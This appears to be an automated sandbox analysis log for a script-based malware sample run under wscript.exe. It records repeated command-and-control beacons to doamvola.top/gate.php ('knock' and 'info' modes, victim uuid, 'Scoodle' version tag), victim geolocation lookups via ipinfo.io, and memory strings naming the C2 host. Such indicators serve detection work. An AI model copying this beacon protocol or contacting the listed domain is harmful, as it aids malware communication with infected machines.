Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Accept: application/json | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: knock | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 0 | Host: doamvola.top
Source: global traffic | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: infouuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 342Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Connection: Keep-AliveAccept: application/jsonUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)mode: knockuuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AEDversion: ScoodleContent-Length: 0Host: doamvola.top
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: ipinfo.io
Source: global traffic | HTTP traffic detected: GET /country HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: ipinfo.io
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: ipinfo.io
Source: global traffic | HTTP traffic detected: GET /country HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: ipinfo.io
Source: unknown | DNS traffic detected: queries for: raw.githubusercontent.com
Source: unknown | HTTP traffic detected: POST /gate.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/json; Charset=UTF-8 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | mode: info | uuid: FB9C3542-FA73-1B4E-FBA4-60E77BE54AED | version: Scoodle | Content-Length: 342 | Host: doamvola.top
Source: wscript.exe, 00000000.00000002.922769761.000001A97B0A3000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: wscript.exe, 00000000.00000003.576403788.000001A97B142000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.835651628.000001C47F8C5000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000000.00000003.310586876.000001A97B140000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.640584970.000001C47F8A9000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pki.goog/GTS1D2.crl0
Source: wscript.exe, 00000000.00000003.310586876.000001A97B140000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.835651628.000001C47F8C5000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: wscript.exe, 00000000.00000002.922769761.000001A97B0A3000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-ha-
Source: wscript.exe, 00000000.00000002.922769761.000001A97B0A3000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: wscript.exe, 00000000.00000002.918750935.000001A97B080000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: wscript.exe, 00000000.00000002.922769761.000001A97B0A3000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: wscript.exe, 00000000.00000002.916942153.000001A97B06D000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupoamvola.top/
Source: wscript.exe, 00000000.00000003.505025786.000001A97B156000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.456424233.000001A97B373000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.921061773.000001A97B094000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.310549088.000001A97B373000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.738047889.000001C47F8F6000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.640712158.000001C47F8F6000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.543302233.000001C47F8F6000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.689639167.000001C47F8F6000.00000004.00000001.sdmp, wscript.exe, 00000008.00000003.375486863.000001C47F8F6000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/
Source: wscript.exe, 00000000.00000003.310180668.000001A97B3BD000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/)
Source: wscript.exe, 00000008.00000003.424235011.000001C47F8F3000.00000004.00000001.sdmp | String found in binary or memory: http://doamvola.top/-
